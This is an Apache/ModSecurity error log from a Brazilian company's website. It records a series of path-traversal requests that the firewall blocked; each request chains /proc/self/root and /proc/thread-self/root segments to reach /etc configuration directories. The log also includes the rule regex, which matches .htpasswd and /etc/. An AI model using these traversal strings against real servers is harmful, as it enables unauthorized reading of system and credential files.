[Thu Mar 19 04:52:20.343440 2026] [:error] [pid 17887:tid 140411607643904] [client 74.7.241.31:53904] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburNAkwaGbbGflqUZCEqAAAANA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:52:21.715399 2026] [:error] [pid 31803:tid 140411540502272] [client 74.7.241.31:40094] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburNeyqAr6etmhZHNozfwAAAFg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:52:22.548483 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.243.128:57490] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburNuoXxyEfFpUF8f_gWwAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:52:23.854945 2026] [:error] [pid 27403:tid 140411632822016] [client 74.7.243.128:57506] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburNxkFeYa1D6dYQnC-HwAAAc0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:52:25.176641 2026] [:error] [pid 30077:tid 140411733534464] [client 74.7.241.31:40098] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburOfu8EFLIOrSqIptt6gAAAkE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:52:27.794920 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.241.31:40110] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburO8df6f5d65gmYZRDRgAAAsc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:52:32.263720 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.243.128:57510] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburQOyqAr6etmhZHNozjwAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:52:32.729848 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.241.31:36748] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburQAkwaGbbGflqUZCErQAAAMY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:52:35.119441 2026] [:error] [pid 27403:tid 140411658000128] [client 74.7.243.128:52152] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburQRkFeYa1D6dYQnC-JAAAAco"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:52:35.166836 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.241.31:36750] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburQuoXxyEfFpUF8f_gZgAAAVA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:52:36.667501 2026] [:error] [pid 30077:tid 140411683178240] [client 74.7.241.31:36764] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburRPu8EFLIOrSqIptt7QAAAkc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:52:37.711461 2026] [mime_magic:error] [pid 26799:tid 140411607643904] (70014)End of file found: [client 74.7.243.128:52162] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/var/mail
[Thu Mar 19 04:52:37.980116 2026] [:error] [pid 30077:tid 140411666392832] [client 74.7.241.31:39792] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburRfu8EFLIOrSqIptt7wAAAkk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:53:00.891388 2026] [:error] [pid 17887:tid 140411590858496] [client 74.7.241.31:39798] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburXAkwaGbbGflqUZCE7QAAANI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:53:03.465517 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.241.31:33362] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburX9a6ubjKNq_cu4YRugAAA1U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:53:05.933359 2026] [:error] [pid 27293:tid 140411574073088] [client 74.7.241.31:33376] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburYf-YZRR_7pZ7nDJdWAAAA9Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:53:07.234653 2026] [:error] [pid 14269:tid 140411708356352] [client 74.7.241.31:33388] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburYwbLMZ6AikZjR9UtQwAAAAQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:53:11.355032 2026] [:error] [pid 17887:tid 140411607643904] [client 74.7.243.128:52166] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburZwkwaGbbGflqUZCE-QAAANA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:53:12.539046 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.241.31:35692] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburaMdf6f5d65gmYZRDcAAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:53:12.725919 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.243.128:60186] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburaOoXxyEfFpUF8f_gkwAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:53:15.114842 2026] [:error] [pid 27403:tid 140411658000128] [client 74.7.243.128:60194] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburahkFeYa1D6dYQnC-MwAAAco"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:53:18.427118 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.241.31:35700] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburbta6ubjKNq_cu4YRxwAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
